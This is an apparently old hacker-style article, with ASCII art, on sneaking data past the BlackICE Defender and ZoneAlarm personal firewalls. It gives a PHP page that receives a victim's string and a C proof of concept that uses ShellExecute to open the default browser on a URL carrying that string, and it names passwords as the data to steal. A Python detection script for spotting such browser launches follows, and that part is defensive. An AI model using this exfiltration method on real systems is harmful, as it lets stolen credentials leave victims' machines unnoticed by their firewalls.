
Bypassing Blackice Defender and ZoneAlarm

                                                     /   ,
                                           /\       \ | /       /\
                                           |  \ \  _.=._  / /  |
                                             \  .  "     "  .  /
                                             /  / ^ \ / ^ \  \
                            . ' ` `  "  ,  /   |  0 | | 0  |   \  ,  "  ` ` ' .
                           /      ,       `  '  \  .---.  /  '  `       ,       \
                         /`     /`\    ,  . "  (          )  " .  ,    /`\      `\
                         /`            (    '  .  ' -.- '  .  '    )             `\
                         /"`              ".  _     :    _  ."                `"\
                           ` / .  ' ` " = ., _ `` = ``_ ,.  =   ` '  . \ `
                         . - " - .              )       (                 . - " - .
+- - - - - - - - { ' .    ' ` }- - - - -~     ~- - - - -{   '  .    ' ` } - - - - - - - -+
|                      ` " ---  " `                                  `   " ---  " `                      |
|     Black Ice Defender / ZoneAlarm Bypasser                                         |
|     To get this idea I tried to turn my brain                                       |
|     upside-down! The include function in PHP                                        |
|     gave me this idea...!                                                           |
|                                                                                     |
|     www.truti.com                                                 Made By Truti     |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -+

Do you know how to make a web page that can receive variables?

In PHP it's simple, just do this:

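<?php
// Read the "blahblah" query parameter explicitly; a bare $blahblah only
// worked with register_globals, which current PHP no longer has.
$blahblah = isset($_GET['blahblah']) ? $_GET['blahblah'] : '';
echo "String from victim: " . htmlspecialchars($blahblah);
?>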

Name it "bypass_script.php"

and point a URL at:
http://www.Your_Host.com/bypass_script.php?blahblah=The_String_You_Whant_To_Get_From_The_Victim

(The_String_You_Whant_To_Get_From_The_Victim is meant to be replaced with something else; a bad person could place a password there and get it through the firewall system!) Remember the max URL length is 255 characters!

Now you think that this all sounds good and easy, but how do you send the string from the victim?
I have made a little C program with a WinAPI call built into it, because the job of the "ShellExecute" command (API) is to open any file with its default program (a web page's default program is often a web browser ;-)

Proof Of Concept Code:

<---------------------------------Start On Source Code--------------------------------->

// Made by: Truti - www.truti.com
// Programmed on Visual C++ 6.0 - STD
// Proof Of Concept Code for bypassing some personal firewalls
// parameter for the [Program].exe [thing_you_want_to_open_on_the_victims_computer]
// e.g. [Program].exe http://www.Your_Host.com/bypass_scr......

#include <windows.h>
#include <tchar.h>

// lpCmdLine is an ANSI string, so build this without UNICODE defined.
int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR lpCmdLine, int nCmdShow)
{
    // "open" hands the argument to its registered default program;
    // for a URL that is normally the web browser.
    HINSTANCE hInstance = ShellExecute(NULL, _T("open"), lpCmdLine, NULL, NULL, nCmdShow);

    // WinMain returns an int exit code, not a pointer.
    return 0;
}

<----------------------------------End Of Source Code---------------------------------->

You are not vulnerable if:
You don't use a web browser for surfing the web, or ZoneAlarm is set to stop even surfing (I have never seen that!).

(I can imagine that this trick works on many other servers than just the two mentioned; if you test it on others, let me know! (main is on www.truti.com - (I change it in the next 2 weeks)))
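A defender's view of the trick above, as an added example that is not part of the original text: a per-application firewall only sees the trusted browser making the connection, so the usable signal is which program started the browser and what URL it passed. The record fields (parent, image, cmdline), the parent allowlist, the length threshold and the sample events are all assumptions constructed for illustration, and the check assumes the launching program shows up as the browser's parent in the process-creation record.

```python
import ntpath
import re
from urllib.parse import parse_qsl, urlsplit

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
# Assumed allowlist of parents that normally hand URLs to a browser; tune per site.
EXPECTED_PARENTS = BROWSERS | {"explorer.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def flag_browser_launches(events, min_value_len=8):
    """Flag browsers started by an unexpected parent with a URL on the
    command line whose query string carries a value of real size."""
    findings = []
    for ev in events:
        image = ntpath.basename(ev["image"]).lower()
        parent = ntpath.basename(ev["parent"]).lower()
        if image not in BROWSERS or parent in EXPECTED_PARENTS:
            continue
        for url in URL_RE.findall(ev["cmdline"]):
            parts = urlsplit(url)
            carried = [k for k, v in parse_qsl(parts.query, keep_blank_values=True)
                       if len(v) >= min_value_len]
            if carried:
                findings.append({"parent": parent, "host": parts.hostname,
                                 "params": carried})
    return findings


IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
# Constructed process-creation records (hypothetical field names, not real logs).
SAMPLE_EVENTS = [
    # Normal: the user clicks a link and the shell starts the browser.
    {"parent": r"C:\WINDOWS\explorer.exe", "image": IE,
     "cmdline": f'"{IE}" http://www.example.com/'},
    # The pattern from the text: a small helper program opens a URL with data in it.
    {"parent": r"C:\TEMP\program.exe", "image": IE,
     "cmdline": f'"{IE}" http://www.example.com/bypass_script.php?blahblah=constructed-sample-value'},
    # Unexpected parent, but only a short id in the query: below the threshold.
    {"parent": r"C:\Program Files\Mail\mailclient.exe", "image": IE,
     "cmdline": f'"{IE}" http://www.example.com/news.php?id=42'},
]

if __name__ == "__main__":
    for finding in flag_browser_launches(SAMPLE_EVENTS):
        print(finding)
```

Lowering min_value_len also surfaces the mail-client launch, which shows why the threshold and the parent allowlist need tuning against normal activity on the host.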

Links:
ShellExecute syntax: msdn.microsoft.com/library/en-us/shellcc/platform/shell/reference/functions/shellexecute.asp
http://www.zonelabs.com/
http://blackice.iss.net/

(I hate when a header is missing)
http://www.truti.com/headers/tchar.h
http://www.truti.com/headers/windows.h


EOF!
